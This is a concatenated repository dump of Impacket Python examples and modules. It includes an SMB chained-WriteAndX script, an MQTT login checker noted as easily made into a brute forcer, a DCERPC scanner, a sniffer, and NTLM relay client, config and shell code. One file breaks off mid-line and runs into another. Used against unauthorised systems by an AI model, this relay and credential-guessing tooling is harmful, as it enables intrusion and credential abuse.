smb.SMBWriteAndX_Parameters() 20 | writeAndX['Parameters']['Fid'] = fid 21 | writeAndX['Parameters']['Offset'] = offset 22 | writeAndX['Parameters']['WriteMode'] = 0 23 | writeAndX['Parameters']['Remaining'] = len(data) 24 | writeAndX['Parameters']['DataLength'] = len(data) 25 | writeAndX['Parameters']['DataOffset'] = len(pkt) 26 | writeAndX['Data'] = data+('A'*4000) 27 | 28 | saved_offset = len(pkt) 29 | 30 | writeAndX2 = smb.SMBCommand(self.SMB_COM_WRITE_ANDX) 31 | pkt.addCommand(writeAndX2) 32 | 33 | writeAndX2['Parameters'] = smb.SMBWriteAndX_Parameters() 34 | writeAndX2['Parameters']['Fid'] = fid 35 | writeAndX2['Parameters']['Offset'] = offset 36 | writeAndX2['Parameters']['WriteMode'] = 0 37 | writeAndX2['Parameters']['Remaining'] = len(data) 38 | writeAndX2['Parameters']['DataLength'] = len(data) 39 | writeAndX2['Parameters']['DataOffset'] = len(pkt) 40 | writeAndX2['Data'] = '\n' 41 | 42 | writeAndX2['Parameters']['AndXCommand'] = self.SMB_COM_WRITE_ANDX 43 | writeAndX2['Parameters']['AndXOffset'] = saved_offset 44 | 45 | self.sendSMB(pkt) 46 | 47 | if wait_answer: 48 | pkt = self.recvSMB() 49 | if pkt.isValidAnswer(self.SMB_COM_WRITE_ANDX): 50 | return pkt 51 | return None 52 | 53 | # Init the example's logger theme 54 | logger.init() 55 | s = lotsSMB('*SMBSERVER','192.168.1.1') 56 | s.login('Administrator','pasword') 57 | tid = s.tree_connect(r'\\*SMBSERVER\IPC$') 58 | fid = s.open_andx(tid, r'\pipe\echo', smb.SMB_O_CREAT, smb.SMB_O_OPEN)[0] 59 | 60 | s.loop_write_andx(tid,fid,'<1234>\n', wait_answer = 0) 61 | 62 | time.sleep(2) 63 | s.close(tid,fid) 64 | 65 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mqtt_check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Author: Alberto Solino (@agsolino) 9 | # 10 | # Description: 11 | # Simple MQTT example aimed at playing with different login options. Can be converted into a account/password 12 | # brute forcer quite easily. 13 | # 14 | # Reference for: 15 | # MQTT and Structure 16 | # 17 | # 18 | 19 | import argparse 20 | import logging 21 | import re 22 | import sys 23 | 24 | from impacket import version 25 | from impacket.examples import logger 26 | from impacket.mqtt import CONNECT_ACK_ERROR_MSGS, MQTTConnection 27 | 28 | try: 29 | import OpenSSL 30 | from OpenSSL import SSL, crypto 31 | except: 32 | logging.critical("pyOpenSSL is not installed, can't continue") 33 | raise 34 | 35 | 36 | class MQTT_LOGIN: 37 | def __init__(self, username, password, target, options): 38 | self._options = options 39 | self._username = username 40 | self._password = password 41 | self._target = target 42 | 43 | if self._username == '': 44 | self._username = None 45 | 46 | def run(self): 47 | mqtt = MQTTConnection(self._target, int(self._options.port), self._options.ssl) 48 | 49 | if self._options.client_id is None: 50 | clientId = ' ' 51 | else: 52 | clientId = self._options.client_id 53 | 54 | mqtt.connect(clientId, self._username, self._password) 55 | 56 | logging.info(CONNECT_ACK_ERROR_MSGS[0]) 57 | 58 | if __name__ == '__main__': 59 | # Init the example's logger theme 60 | logger.init() 61 | print version.BANNER 62 | parser = argparse.ArgumentParser(add_help=False, 63 | description="MQTT login check") 64 | parser.add_argument("--help", action="help", help='show this help message and exit') 65 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') 66 | parser.add_argument('-client-id', action='store', help='Client ID used when authenticating (default random)') 67 | parser.add_argument('-ssl', action='store_true', help='turn SSL on') 68 | parser.add_argument('-port', action='store', default='1883', help='port to connect to (default 1883)') 69 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 70 | 71 | try: 72 | options = parser.parse_args() 73 | except Exception, e: 74 | logging.error(str(e)) 75 | sys.exit(1) 76 | 77 | if options.debug is True: 78 | logging.getLogger().setLevel(logging.DEBUG) 79 | else: 80 | logging.getLogger().setLevel(logging.INFO) 81 | 82 | domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( 83 | options.target).groups('') 84 | 85 | #In case the password contains '@' 86 | if '@' in address: 87 | password = password + '@' + address.rpartition('@')[0] 88 | address = address.rpartition('@')[2] 89 | 90 | check_mqtt = MQTT_LOGIN(username, password, address, options) 91 | try: 92 | check_mqtt.run() 93 | except Exception, e: 94 | #import traceback 95 | #traceback.print_exc() 96 | logging.error(e) 97 | 98 | 99 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mssqlinstance.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: [MC-SQLR] example. Retrieves the instances names from the target host 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | # Reference for: 14 | # Structure 15 | # 16 | 17 | 18 | import argparse 19 | import sys 20 | import string 21 | import logging 22 | 23 | from impacket.examples import logger 24 | from impacket import version, tds 25 | 26 | if __name__ == '__main__': 27 | 28 | print version.BANNER 29 | # Init the example's logger theme 30 | logger.init() 31 | 32 | parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.") 33 | 34 | parser.add_argument('host', action='store', help='target host') 35 | parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') 36 | 37 | if len(sys.argv)==1: 38 | parser.print_help() 39 | sys.exit(1) 40 | 41 | options = parser.parse_args() 42 | 43 | ms_sql = tds.MSSQL(options.host) 44 | instances = ms_sql.getInstances(string.atoi(options.timeout)) 45 | if len(instances) == 0: 46 | "No MSSQL Instances found" 47 | else: 48 | for i, instance in enumerate(instances): 49 | logging.info("Instance %d" % i) 50 | for key in instance.keys(): 51 | print key + ":" + instance[key] 52 | 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/opdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """opdump - scan for operations on a given DCERPC interface 3 | 4 | Usage: opdump.py hostname port interface version 5 | 6 | This binds to the given hostname:port and DCERPC interface. Then, it tries to 7 | call each of the first 256 operation numbers in turn and reports the outcome 8 | of each call. 9 | 10 | This will generate a burst of TCP connections to the given host:port! 11 | 12 | Example: 13 | $ ./opdump.py 10.0.0.30 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0 14 | op 0 (0x00): rpc_x_bad_stub_data 15 | op 1 (0x01): rpc_x_bad_stub_data 16 | op 2 (0x02): rpc_x_bad_stub_data 17 | op 3 (0x03): success 18 | op 4 (0x04): rpc_x_bad_stub_data 19 | ops 5-255: nca_s_op_rng_error 20 | 21 | rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an 22 | operation at that number. 23 | 24 | Author: Catalin Patulea 25 | """ 26 | import sys 27 | 28 | from impacket.examples import logger 29 | from impacket import uuid 30 | from impacket.dcerpc.v5 import transport 31 | 32 | 33 | def main(args): 34 | if len(args) != 4: 35 | print "usage: opdump.py hostname port interface version" 36 | return 1 37 | 38 | host, port, interface, version = args[0], int(args[1]), args[2], args[3] 39 | 40 | stringbinding = "ncacn_ip_tcp:%s" % host 41 | trans = transport.DCERPCTransportFactory(stringbinding) 42 | trans.set_dport(port) 43 | 44 | results = [] 45 | for i in range(256): 46 | dce = trans.get_dce_rpc() 47 | dce.connect() 48 | 49 | iid = uuid.uuidtup_to_bin((interface, version)) 50 | dce.bind(iid) 51 | 52 | dce.call(i, "") 53 | try: 54 | dce.recv() 55 | except Exception, e: 56 | result = str(e) 57 | else: 58 | result = "success" 59 | 60 | dce.disconnect() 61 | 62 | results.append(result) 63 | 64 | # trim duplicate suffixes from the back 65 | suffix = results[-1] 66 | while results and results[-1] == suffix: 67 | results.pop() 68 | 69 | for i, result in enumerate(results): 70 | print "op %d (0x%02x): %s" % (i, i, result) 71 | 72 | print "ops %d-%d: %s" % (len(results), 255, suffix) 73 | 74 | if __name__ == "__main__": 75 | # Init the example's logger theme 76 | logger.init() 77 | sys.exit(main(sys.argv[1:])) 78 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/ping.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple ICMP ping. 9 | # 10 | # This implementation of ping uses the ICMP echo and echo-reply packets 11 | # to check the status of a host. If the remote host is up, it should reply 12 | # to the echo probe with an echo-reply packet. 13 | # Note that this isn't a definite test, as in the case the remote host is up 14 | # but refuses to reply the probes. 15 | # Also note that the user must have special access to be able to open a raw 16 | # socket, which this program requires. 17 | # 18 | # Authors: 19 | # Gerardo Richarte 20 | # Javier Kohen 21 | # 22 | # Reference for: 23 | # ImpactPacket: IP, ICMP, DATA. 24 | # ImpactDecoder. 25 | 26 | import select 27 | import socket 28 | import time 29 | import sys 30 | 31 | from impacket import ImpactDecoder, ImpactPacket 32 | 33 | if len(sys.argv) < 3: 34 | print "Use: %s " % sys.argv[0] 35 | sys.exit(1) 36 | 37 | src = sys.argv[1] 38 | dst = sys.argv[2] 39 | 40 | # Create a new IP packet and set its source and destination addresses. 41 | 42 | ip = ImpactPacket.IP() 43 | ip.set_ip_src(src) 44 | ip.set_ip_dst(dst) 45 | 46 | # Create a new ICMP packet of type ECHO. 47 | 48 | icmp = ImpactPacket.ICMP() 49 | icmp.set_icmp_type(icmp.ICMP_ECHO) 50 | 51 | # Include a 156-character long payload inside the ICMP packet. 52 | icmp.contains(ImpactPacket.Data("A"*156)) 53 | 54 | # Have the IP packet contain the ICMP packet (along with its payload). 55 | ip.contains(icmp) 56 | 57 | # Open a raw socket. Special permissions are usually required. 58 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) 59 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 60 | 61 | seq_id = 0 62 | while 1: 63 | # Give the ICMP packet the next ID in the sequence. 64 | seq_id += 1 65 | icmp.set_icmp_id(seq_id) 66 | 67 | # Calculate its checksum. 68 | icmp.set_icmp_cksum(0) 69 | icmp.auto_checksum = 1 70 | 71 | # Send it to the target host. 72 | s.sendto(ip.get_packet(), (dst, 0)) 73 | 74 | # Wait for incoming replies. 75 | if s in select.select([s],[],[],1)[0]: 76 | reply = s.recvfrom(2000)[0] 77 | 78 | # Use ImpactDecoder to reconstruct the packet hierarchy. 79 | rip = ImpactDecoder.IPDecoder().decode(reply) 80 | # Extract the ICMP packet from its container (the IP packet). 81 | ricmp = rip.child() 82 | 83 | # If the packet matches, report it to the user. 84 | if rip.get_ip_dst() == src and rip.get_ip_src() == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type(): 85 | print "Ping reply for sequence #%d" % ricmp.get_icmp_id() 86 | 87 | time.sleep(1) 88 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/ping6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple ICMP6 ping. 9 | # 10 | # This implementation of ping uses the ICMP echo and echo-reply packets 11 | # to check the status of a host. If the remote host is up, it should reply 12 | # to the echo probe with an echo-reply packet. 13 | # Note that this isn't a definite test, as in the case the remote host is up 14 | # but refuses to reply the probes. 15 | # Also note that the user must have special access to be able to open a raw 16 | # socket, which this program requires. 17 | # 18 | # Authors: 19 | # Alberto Solino (@agsolino) 20 | # 21 | # Reference for: 22 | # ImpactPacket: ICMP6 23 | # ImpactDecoder. 24 | 25 | import select 26 | import socket 27 | import time 28 | import sys 29 | 30 | from impacket import ImpactDecoder, ImpactPacket, IP6, ICMP6, version 31 | 32 | print version.BANNER 33 | 34 | if len(sys.argv) < 3: 35 | print "Use: %s " % sys.argv[0] 36 | sys.exit(1) 37 | 38 | src = sys.argv[1] 39 | dst = sys.argv[2] 40 | 41 | # Create a new IP packet and set its source and destination addresses. 42 | 43 | ip = IP6.IP6() 44 | ip.set_ip_src(src) 45 | ip.set_ip_dst(dst) 46 | ip.set_traffic_class(0) 47 | ip.set_flow_label(0) 48 | ip.set_hop_limit(64) 49 | 50 | # Open a raw socket. Special permissions are usually required. 51 | s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6) 52 | 53 | payload = "A"*156 54 | 55 | print "PING %s %d data bytes" % (dst, len(payload)) 56 | seq_id = 0 57 | while 1: 58 | # Give the ICMP packet the next ID in the sequence. 59 | seq_id += 1 60 | icmp = ICMP6.ICMP6.Echo_Request(1, seq_id, payload) 61 | 62 | # Have the IP packet contain the ICMP packet (along with its payload). 63 | ip.contains(icmp) 64 | ip.set_next_header(ip.child().get_ip_protocol_number()) 65 | ip.set_payload_length(ip.child().get_size()) 66 | icmp.calculate_checksum() 67 | 68 | # Send it to the target host. 69 | s.sendto(icmp.get_packet(), (dst, 0)) 70 | 71 | # Wait for incoming replies. 72 | if s in select.select([s],[],[],1)[0]: 73 | reply = s.recvfrom(2000)[0] 74 | 75 | # Use ImpactDecoder to reconstruct the packet hierarchy. 76 | rip = ImpactDecoder.ICMP6Decoder().decode(reply) 77 | 78 | # If the packet matches, report it to the user. 79 | if ICMP6.ICMP6.ECHO_REPLY == rip.get_type(): 80 | print "%d bytes from %s: icmp_seq=%d " % (rip.child().get_size()-4,dst,rip.get_echo_sequence_number()) 81 | 82 | time.sleep(1) 83 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/smbserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple SMB Server example. 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | 14 | import sys 15 | import argparse 16 | import logging 17 | 18 | from impacket.examples import logger 19 | from impacket import smbserver, version 20 | 21 | if __name__ == '__main__': 22 | 23 | # Init the example's logger theme 24 | logger.init() 25 | print version.BANNER 26 | 27 | parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a " 28 | "share specified as an argument. You need to be root in order to bind to port 445. " 29 | "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP " 30 | "/tmp") 31 | 32 | parser.add_argument('shareName', action='store', help='name of the share to add') 33 | parser.add_argument('sharePath', action='store', help='path of the share to add') 34 | parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares') 35 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 36 | parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') 37 | 38 | if len(sys.argv)==1: 39 | parser.print_help() 40 | sys.exit(1) 41 | 42 | try: 43 | options = parser.parse_args() 44 | except Exception, e: 45 | logging.critical(str(e)) 46 | sys.exit(1) 47 | 48 | if options.debug is True: 49 | logging.getLogger().setLevel(logging.DEBUG) 50 | else: 51 | logging.getLogger().setLevel(logging.INFO) 52 | 53 | if options.comment is None: 54 | comment = '' 55 | else: 56 | comment = options.comment 57 | 58 | server = smbserver.SimpleSMBServer() 59 | 60 | server.addShare(options.shareName.upper(), options.sharePath, comment) 61 | server.setSMB2Support(options.smb2support) 62 | 63 | # Here you can set a custom SMB challenge in hex format 64 | # If empty defaults to '4141414141414141' 65 | # (remember: must be 16 hex bytes long) 66 | # e.g. server.setSMBChallenge('12345678abcdef00') 67 | server.setSMBChallenge('') 68 | 69 | # If you don't want log to stdout, comment the following line 70 | # If you want log dumped to a file, enter the filename 71 | server.setLogFile('') 72 | 73 | # Rock and roll 74 | server.start() 75 | 76 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple packet sniffer. 9 | # 10 | # This packet sniffer uses a raw socket to listen for packets 11 | # in transit corresponding to the specified protocols. 12 | # 13 | # Note that the user might need special permissions to be able to use 14 | # raw sockets. 15 | # 16 | # Authors: 17 | # Gerardo Richarte 18 | # Javier Kohen 19 | # 20 | # Reference for: 21 | # ImpactDecoder. 22 | 23 | from select import select 24 | import socket 25 | import sys 26 | 27 | from impacket import ImpactDecoder 28 | 29 | DEFAULT_PROTOCOLS = ('icmp', 'tcp', 'udp') 30 | 31 | if len(sys.argv) == 1: 32 | toListen = DEFAULT_PROTOCOLS 33 | print "Using default set of protocols. A list of protocols can be supplied from the command line, eg.: %s [proto2] ..." % sys.argv[0] 34 | else: 35 | toListen = sys.argv[1:] 36 | 37 | # Open one socket for each specified protocol. 38 | # A special option is set on the socket so that IP headers are included with 39 | # the returned data. 40 | sockets = [] 41 | for protocol in toListen: 42 | try: 43 | protocol_num = socket.getprotobyname(protocol) 44 | except socket.error: 45 | print "Ignoring unknown protocol:", protocol 46 | toListen.remove(protocol) 47 | continue 48 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol_num) 49 | s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) 50 | sockets.append(s) 51 | 52 | if 0 == len(toListen): 53 | print "There are no protocols available." 54 | sys.exit(0) 55 | 56 | print "Listening on protocols:", toListen 57 | 58 | # Instantiate an IP packets decoder. 59 | # As all the packets include their IP header, that decoder only is enough. 60 | decoder = ImpactDecoder.IPDecoder() 61 | 62 | while len(sockets) > 0: 63 | # Wait for an incoming packet on any socket. 64 | ready = select(sockets, [], [])[0] 65 | for s in ready: 66 | packet = s.recvfrom(4096)[0] 67 | if 0 == len(packet): 68 | # Socket remotely closed. Discard it. 69 | sockets.remove(s) 70 | s.close() 71 | else: 72 | # Packet received. Decode and display it. 73 | packet = decoder.decode(packet) 74 | print packet 75 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/uncrc32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # based on: 3 | # 4 | # Reversing CRC - Theory and Practice. 5 | # HU Berlin Public Report 6 | # SAR-PR-2006-05 7 | # May 2006 8 | # Authors: 9 | # Martin Stigge, Henryk Plotz, Wolf Muller, Jens-Peter Redlich 10 | 11 | FINALXOR = 0xffffffffL 12 | INITXOR = 0xffffffffL 13 | CRCPOLY = 0xEDB88320L 14 | CRCINV = 0x5B358FD3L 15 | 16 | from binascii import crc32 17 | from struct import pack 18 | 19 | def tableAt(byte): 20 | return crc32(chr(byte ^ 0xff)) & 0xffffffff ^ FINALXOR ^ (INITXOR >> 8) 21 | 22 | def compensate(buf, wanted): 23 | wanted ^= FINALXOR 24 | 25 | newBits = 0 26 | for i in range(32): 27 | if newBits & 1: 28 | newBits >>= 1 29 | newBits ^= CRCPOLY 30 | else: 31 | newBits >>= 1 32 | 33 | if wanted & 1: 34 | newBits ^= CRCINV 35 | 36 | wanted >>= 1 37 | 38 | newBits ^= crc32(buf) ^ FINALXOR 39 | return pack('") 29 | 30 | class EAPR(ProtocolPacket): 31 | """It represents a request or a response in EAP (codes 1 and 2)""" 32 | 33 | IDENTITY = 0x01 34 | EXPANDED = 0xfe 35 | 36 | header_size = 1 37 | tail_size = 0 38 | 39 | type = Byte(0) 40 | 41 | class EAP(ProtocolPacket): 42 | REQUEST = 0x01 43 | RESPONSE = 0x02 44 | SUCCESS = 0x03 45 | FAILURE = 0x04 46 | 47 | header_size = 4 48 | tail_size = 0 49 | 50 | code = Byte(0) 51 | identifier = Byte(1) 52 | length = Word(2, ">") 53 | 54 | class EAPOL(ProtocolPacket): 55 | EAP_PACKET = 0x00 56 | EAPOL_START = 0x01 57 | EAPOL_LOGOFF = 0x02 58 | EAPOL_KEY = 0x03 59 | EAPOL_ENCAPSULATED_ASF_ALERT = 0x04 60 | 61 | DOT1X_VERSION = 0x01 62 | 63 | header_size = 4 64 | tail_size = 0 65 | 66 | version = Byte(0) 67 | packet_type = Byte(1) 68 | body_length = Word(2, ">") 69 | 70 | 71 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: This logger is intended to be used by impacket instead 9 | # of printing directly. This will allow other libraries to use their 10 | # custom logging implementation. 11 | # 12 | 13 | import logging 14 | import sys 15 | 16 | # This module can be used by scripts using the Impacket library 17 | # in order to configure the root logger to output events 18 | # generated by the library with a predefined format 19 | 20 | # If the scripts want to generate log entries, they can write 21 | # directly to the root logger (logging.info, debug, etc). 22 | 23 | class ImpacketFormatter(logging.Formatter): 24 | ''' 25 | Prefixing logged messages through the custom attribute 'bullet'. 26 | ''' 27 | def __init__(self): 28 | logging.Formatter.__init__(self,'%(bullet)s %(message)s', None) 29 | 30 | def format(self, record): 31 | if record.levelno == logging.INFO: 32 | record.bullet = '[*]' 33 | elif record.levelno == logging.DEBUG: 34 | record.bullet = '[+]' 35 | elif record.levelno == logging.WARNING: 36 | record.bullet = '[!]' 37 | else: 38 | record.bullet = '[-]' 39 | 40 | return logging.Formatter.format(self, record) 41 | 42 | def init(): 43 | # We add a StreamHandler and formatter to the root logger 44 | handler = logging.StreamHandler(sys.stdout) 45 | handler.setFormatter(ImpacketFormatter()) 46 | logging.getLogger().addHandler(handler) 47 | logging.getLogger().setLevel(logging.INFO) 48 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/__init__.py: -------------------------------------------------------------------------------- 1 | from mssqlrelayclient import MSSQLRelayClient 2 | from smbrelayclient import SMBRelayClient 3 | from ldaprelayclient import LDAPRelayClient 4 | from httprelayclient import HTTPRelayClient 5 | from imaprelayclient import IMAPRelayClient -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/clients/imaprelayclient.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Author: 9 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 10 | # 11 | # Description: 12 | # IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange 13 | # 14 | import logging 15 | import imaplib 16 | import base64 17 | 18 | class IMAPRelayClient: 19 | def __init__(self, target): 20 | # Target comes as protocol://target:port 21 | self.target = target 22 | proto, host, port = target.split(':') 23 | host = host[2:] 24 | if int(port) == 993 or proto.upper() == 'IMAPS': 25 | self.session = imaplib.IMAP4_SSL(host,int(port)) 26 | else: 27 | #assume non-ssl IMAP 28 | self.session = imaplib.IMAP4(host,port) 29 | if 'AUTH=NTLM' not in self.session.capabilities: 30 | logging.error('IMAP server does not support NTLM authentication!') 31 | return False 32 | self.authtag = self.session._new_tag() 33 | self.lastresult = None 34 | 35 | def sendNegotiate(self,negotiateMessage): 36 | #Negotiate auth 37 | negotiate = base64.b64encode(negotiateMessage) 38 | self.session.send('%s AUTHENTICATE NTLM%s' % (self.authtag,imaplib.CRLF)) 39 | resp = self.session.readline().strip() 40 | if resp != '+': 41 | logging.error('IMAP Client error, expected continuation (+), got %s ' % resp) 42 | return False 43 | else: 44 | self.session.send(negotiate + imaplib.CRLF) 45 | try: 46 | serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char 47 | serverChallenge = base64.b64decode(serverChallengeBase64) 48 | return serverChallenge 49 | except (IndexError, KeyError, AttributeError): 50 | logging.error('No NTLM challenge returned from IMAP server') 51 | 52 | def sendAuth(self,authenticateMessageBlob, serverChallenge=None): 53 | #Send auth 54 | auth = base64.b64encode(authenticateMessageBlob) 55 | self.session.send(auth + imaplib.CRLF) 56 | typ, data = self.session._get_tagged_response(self.authtag) 57 | if typ == 'OK': 58 | self.session.state = 'AUTH' 59 | return True 60 | else: 61 | logging.info('Auth failed - IMAP server said: %s' % ' '.join(data)) 62 | return False 63 | 64 | #SMB Relay server needs this 65 | @staticmethod 66 | def get_encryption_key(): 67 | return None -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/servers/__init__.py: -------------------------------------------------------------------------------- 1 | from httprelayserver import HTTPRelayServer 2 | from smbrelayserver import SMBRelayServer 3 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2013-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Config utilities 9 | # 10 | # Author: 11 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 12 | # 13 | # Description: 14 | # Configuration class which holds the config specified on the 15 | # command line, this can be passed to the tools' servers and clients 16 | class NTLMRelayxConfig: 17 | def __init__(self): 18 | self.daemon = True 19 | self.domainIp = None 20 | self.machineAccount = None 21 | self.machineHashes = None 22 | self.target = None 23 | self.mode = None 24 | self.redirecthost = None 25 | self.outputFile = None 26 | self.attacks = None 27 | self.lootdir = None 28 | self.randomtargets = False 29 | self.encoding = None 30 | 31 | #SMB options 32 | self.exeFile = None 33 | self.command = None 34 | self.interactive = False 35 | 36 | #LDAP options 37 | self.dumpdomain = True 38 | self.addda = True 39 | 40 | #MSSQL options 41 | self.queries = [] 42 | 43 | def setOutputFile(self,outputFile): 44 | self.outputFile = outputFile 45 | 46 | def setTargets(self, target): 47 | self.target = target 48 | 49 | def setExeFile(self, filename): 50 | self.exeFile = filename 51 | 52 | def setCommand(self, command): 53 | self.command = command 54 | 55 | def setEncoding(self, encoding): 56 | self.encoding = encoding 57 | 58 | def setMode(self,mode): 59 | self.mode = mode 60 | 61 | def setAttacks(self,attacks): 62 | self.attacks = attacks 63 | 64 | def setLootdir(self,lootdir): 65 | self.lootdir = lootdir 66 | 67 | def setRedirectHost(self,redirecthost): 68 | self.redirecthost = redirecthost 69 | 70 | def setDomainAccount( self, machineAccount, machineHashes, domainIp): 71 | self.machineAccount = machineAccount 72 | self.machineHashes = machineHashes 73 | self.domainIp = domainIp 74 | 75 | def setRandomTargets(self,randomtargets): 76 | self.randomtargets = randomtargets 77 | 78 | def setLDAPOptions(self,dumpdomain,addda): 79 | self.dumpdomain = dumpdomain 80 | self.addda = addda 81 | 82 | def setMSSQLOptions(self,queries): 83 | self.queries = queries 84 | 85 | def setInteractive(self,interactive): 86 | self.interactive = interactive 87 | 88 | def setIMAPOptions(self,keyword,mailbox,dump_all,dump_max): 89 | self.keyword = keyword 90 | self.mailbox = mailbox 91 | self.dump_all = dump_all 92 | self.dump_max = dump_max 93 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2013-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # TCP interactive shell 9 | # 10 | # Author: 11 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) 12 | # 13 | # Description: 14 | # Launches a TCP shell for interactive use of clients 15 | # after successful relaying 16 | import socket 17 | #Default listen port 18 | port = 11000 19 | class TcpShell: 20 | def __init__(self): 21 | global port 22 | self.port = port 23 | #Increase the default port for the next attack 24 | port += 1 25 | 26 | def listen(self): 27 | #Set up the listening socket 28 | serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | #Bind on localhost 30 | serversocket.bind(('127.0.0.1', self.port)) 31 | #Dont allow a backlog 32 | serversocket.listen(0) 33 | self.connection, host = serversocket.accept() 34 | #Create a file object from the socket 35 | self.socketfile = self.connection.makefile() -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/krb5/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/ldap/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/__init__.py: -------------------------------------------------------------------------------- 